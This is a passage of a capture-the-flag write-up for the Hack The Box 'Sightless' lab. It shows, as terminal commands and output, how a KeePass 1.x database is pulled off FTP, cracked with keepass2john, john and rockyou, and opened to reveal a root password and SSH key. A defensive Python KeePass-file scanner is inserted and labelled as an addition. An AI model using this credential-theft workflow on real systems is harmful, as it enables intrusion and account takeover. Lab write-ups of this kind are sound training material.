FTP


I have reset the password of the web1 account for the FTP server on the Froxlor admin panel

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ lftp -u web1 $IP
Password: Qwer1234
lftp web1@10.129.242.165:~> 

Successfully authenticated to the FTP server

lftp web1@10.129.242.165:~> ls                     
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown.  (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)
lftp web1@10.129.242.165:~> set ssl:verify-certificate off

Disabling the SSL verification

index.html


lftp web1@10.129.242.165:~> ls
drwxr-xr-x   3 web1     web1         4096 May 17 03:17 goaccess
-rw-r--r--   1 web1     web1         8376 Mar 29 10:29 index.html

goaccess

lftp web1@10.129.242.165:/> get index.html
8376 bytes transferred                       

Downloaded the index.html file

KeePass DB


lftp web1@10.129.242.165:/> cd goaccess
lftp web1@10.129.242.165:/goaccess> ls
drwxr-xr-x   2 web1     web1         4096 Aug  2 07:14 backup

goaccess/backup

lftp web1@10.129.242.165:/goaccess> cd backup
lftp web1@10.129.242.165:/goaccess/backup> ls
-rw-r--r--   1 web1     web1         5292 Aug  6 14:29 Database.kdb

There is a KeePass DB file: Database.kdb

lftp web1@10.129.242.165:/goaccess/backup> get Database.kdb
5292 bytes transferred

Downloaded to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ file Database.kdb                                                                     
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds

It is indeed a KeePass DB file, but in a very old format: 1.x
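Added example (not part of the original write-up): a defender-side audit that walks a served directory, such as an FTP or web root, and flags KeePass databases by magic bytes rather than by extension, parsing the same 1.x header fields that file reports above. The function names, the Database.bak file name, and the sample header (zeroed seeds, constructed flags and version values) are assumptions made for the example.

```python
import os
import struct
import tempfile

SIG1 = 0x9AA2D903       # first signature, shared by KeePass 1.x and 2.x
SIG2_KDB = 0xB54BFB65   # second signature, KeePass 1.x (.kdb)
SIG2_KDBX = 0xB54BFB67  # second signature, KeePass 2.x (.kdbx)
# KeePass 1.x fixed 124-byte header: sig1, sig2, flags, version, master seed,
# IV, group count, entry count, contents hash, transform seed, key rounds.
KDB_HEADER = struct.Struct("<4I16s16s2I32s32sI")
CIPHER_FLAGS = {2: "AES", 8: "Twofish"}  # cipher bits of the flags field

def inspect_keepass(data):
    """Return header facts for a KeePass file, or None for anything else."""
    if len(data) < 8 or struct.unpack_from("<I", data)[0] != SIG1:
        return None
    sig2 = struct.unpack_from("<I", data, 4)[0]
    if sig2 == SIG2_KDBX:
        return {"format": "KDBX 2.x"}
    if sig2 != SIG2_KDB or len(data) < KDB_HEADER.size:
        return None
    _, _, flags, _, _, _, groups, entries, _, _, rounds = KDB_HEADER.unpack_from(data)
    cipher = next((n for bit, n in CIPHER_FLAGS.items() if flags & bit), "unknown")
    return {"format": "KDB 1.x", "cipher": cipher, "groups": groups,
            "entries": entries, "rounds": rounds}

def audit_tree(root):
    """Flag KeePass databases under root by content, not by file extension."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                info = inspect_keepass(fh.read(KDB_HEADER.size))
            if info:
                findings.append((os.path.relpath(path, root), info))
    return sorted(findings, key=lambda f: f[0])

def demo():
    """Constructed sample tree; counts and rounds mirror the file output above."""
    header = KDB_HEADER.pack(SIG1, SIG2_KDB, 1 | 2, 0x00030002, bytes(16),
                             bytes(16), 8, 4, bytes(32), bytes(32), 600000)
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "goaccess", "backup"))
        for rel, blob in (("goaccess/backup/Database.bak", header), ("index.html", b"<html>")):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(blob)
        return audit_tree(root)
```

Calling audit_tree() on a real document root returns (relative path, header facts) pairs, so a renamed database in a backup folder is still reported.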

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepassxc Database.kdb 

It’s password-protected

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepass2john Database.kdb > Database.kdb.hash
Inlining Database.kdb

Turning the DB file into a crack-able hash string

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ john Database.kdb.hash --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs         (Database.kdb)     
1g 0:00:00:22 DONE (2024-09-08 13:29) 0.04490g/s 47.41p/s 47.41c/s 47.41C/s bullshit..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

john cracked the password hash. The cracked DB password is bulldogs

Unlocked


Importing (Unlocking)

Unlocked.

There is a single entry. It appears to be the credential of the root account: root:q6gnLTB74L132TMdFCpK

There is also an attachment: id_rsa. I will save that into the current directory. Moving on to the Privilege Escalation phase